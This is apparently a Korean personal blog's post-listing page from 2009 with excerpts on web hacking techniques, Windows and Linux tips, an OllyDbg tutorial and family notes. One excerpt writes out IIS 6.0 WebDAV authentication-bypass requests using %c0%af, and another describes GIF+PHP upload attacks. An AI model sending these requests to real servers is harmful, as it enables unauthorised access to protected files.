전체 글452 GIF+PHP 해킹 아래 '해킹에 도움이 되는 IE 기능'을 적다 생각나서 GIF+PHP를 이용한 해킹에 대해 정리. Gif+Php 조합을 이용해 PHP 서버를 공격하는 시나리오. http://isc.sans.org/diary.html?storyid=2997 http://www.phpclasses.org/blog/post/67-PHP-security-exploit-with-GIF-images.html 기본 구상은 GIFAR와 유사한데, PHP로 구축된 대상 웹 사이트가 이미지 파일 업로드를 허용하는 경우 GIF+PHP 파일을 서버에 업로드한 후 Local include 취약점이나 이미지 뷰 기능을 이용해 해당 PHP 코드를 실행시킬 수 있다. 이때 관리자가 IE를 사용하고 있으면 관리자 눈에는 아래와 같이 정상적인 이미지만.. 2009. 5. 19. 멋진 테트리스 ㅋ 어떤 한 빌딩의 램프를 해킹해서 테트리스를 함 ㅋ 2009. 5. 18. 진정한 노트북! 진짜 노트북이당!! 와우! 2009. 5. 18. A textbook example of Blind SQL Injection 우하하 잼나징!!! 위 동영상은 화면이 잘린 상태기 때문에 다운로드하는게 좋을 듯 파일 합치는 툴은 FFSJ_Setup.exe 2009. 5. 18. SecureState SQL Injection Video 원본은 사이즈가 커서 보기 쉬울 꺼에요 ^^ 2009. 5. 18. Microsoft IIS 6.0 WebDAV Remote Authentication Bypass IIS 6.0에서 WebDAV로 인증하는 /protected/ 디렉토리에 %c0%af(예: /prot%c0%afected/) 를 넣어서 인증을 우회하는 방법임 GET /prot%c0%afected/protected.zip HTTP/1.1 Translate: f Connection: close Host: servername 우회 해서 디렉토리 리스트 받아오기 PROPFIND /protec%c0%afted/ HTTP/1.1 Host: servername User-Agent: neo/0.12.2 Connection: TE TE: trailers Depth: 1 Content-Length: 288 Content-Type: application/xml 실전 동영상 긴급 입수! P.S 음.. 그런데 WebDAV 만.. 2009. 5. 18. Windows7 알림영역 아이콘 과거항목 지우기 프로그램 및 파일검색에서 regedit 실행 Regedit에서 TrayNotify 검색 [HKEY_USERS\S-1-5-21-1477743090-1654347857-2786979719-1002\Software\Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\TrayNotify] 요부분이 찾아짐 S-1-5-21-1477743090-1654347857-2786979719-1002는 바뀔수가 있음 IconStreams과 PastIconsStream 키를 삭제 작업관리자(CTRL+SHIFT+ESC)를 이용해서 explorer.exe를 죽이기(죽일 경우 밑에 데스크바가 사라짐) 작업관리자에서 파일(F)->새 작업(실행..)(N) 클릭 후 expl.. 2009. 5. 12. 초보자를 위한 예제와 함께 배워보는 OllyDbg사용법 http://cafe.naver.com/ArticleList.nhn?search.clubid=15262343&search.menuid=86&search.boardtype= 위 사이트에 가면 나옴 ㅋㅋ [ITBANK 정보보안전문학원 / 리버스강좌] 초보자를 위한 예제와 함께 배워보는 OllyDbg사용법 요 약 : Ollydbg 프로그램을 이용하여 Reverse Engineering을 하는 방법에 대해서 다룬다. 초보자를 위하여 작성된 문서이며 예제와 함께 Ollydbg의 각 기능에 대해서 알아본다. 주로 기초적인 내용을 다루고 있다. 0. Prolog 이 강좌는 Debugging과 Reverse Engineering을 하기 위한 강력하고 효과적인 프로그램인 OllyDbg의 사용법을 제공하기 위해 만들어졌습.. 2009. 5. 12. 아파치 모듈 설명 ################################################################################################## apache설치시 --enable-mods-shared=all 옵션으로 모든모듈 DSO 방식으로 설치시 2.2버전에서 기본적으로 아래모듈이 올라와 있습니다. 이중 필요없는 것은 지우시고 이것저것 태스트 하신다음 최적의 dso 아파치를 만드세요~ ^^; ################################################################################################## LoadModule authn_file_module modules/mod_authn_file.so 문자파일.. 2009. 5. 12. 18주된 설이 울 설이 많이 컸다 ㅍㅍ 2009. 5. 11. 20090404 인정병원으로 병원을 옮기고 ^^ 2009. 5. 11. Linux/Unix date 명령어 공부 $ date 하면 다음처럼 지금의 날짜와 시간을 보여 줍니다. 2009. 04. 17. (금) 18:52:15 KST 어제의 날짜를 알고 싶으면, $ date -d yesterday $ data --date="yesterday" 이 방식이 괜히 머리쓴다고, 날짜빼고, carry되는 거 계산해서, 달에서 하나 빼고 하는 방식보다 훨씬 간편하고 정확합니다. 즉, 오늘이 4월 1일이면, 어제는 4월 0일이아니라, 3월 31이 됩니다. 며칠 전의 날짜를 알고 싶으면, $ date -d "-100 days" $ date -d "100 days ago" $ date --date="-100 days" $ date --date="100 days ago" 이 옵션값들은 100일 전의 날짜를 표시합니다. 며칠 후의 날짜를.. 2009. 5. 8. 이전 1 ··· 32 33 34 35 36 37 38 다음